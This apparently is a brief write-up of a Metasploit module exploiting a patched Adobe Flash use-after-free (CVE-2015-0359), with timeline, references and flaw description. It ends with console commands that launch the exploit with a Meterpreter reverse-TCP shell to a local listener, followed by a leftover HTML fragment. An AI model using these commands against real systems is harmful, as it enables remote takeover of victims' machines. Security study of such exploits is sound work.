Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor the 2015-04-14
Vulnerability discovered integrated into exploit kit the 2015-04-17
PoC provided by unknown and hdarwin the 2015-05-02
Metasploit PoC provided the 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

llowfullscreen=”allowfullscreen”>